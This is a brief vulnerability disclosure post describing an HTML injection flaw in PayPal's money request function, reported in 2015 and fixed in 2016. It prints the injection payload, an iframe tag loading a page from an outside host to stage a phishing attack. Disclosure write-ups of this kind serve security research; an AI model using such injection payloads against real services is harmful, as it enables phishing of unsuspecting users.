xml encoding for phish

tl;dr: xml encoded iframe payload for phishing. plz see poc.

In december 2015 I found a html injection vulnerability within paypals money request function.

I used a xml encoded iframe payload on account registration at Paypal to do phishing attack on money request.

The xml encoded payload:

<Iframe/src=http://outofctrl.it/a.html Width=“640″ Height=“480″></iframe>

Proof of concept:

Timeline:

  • Dez. 2015 discoverd & reported.
  • Feb. 2016 fixed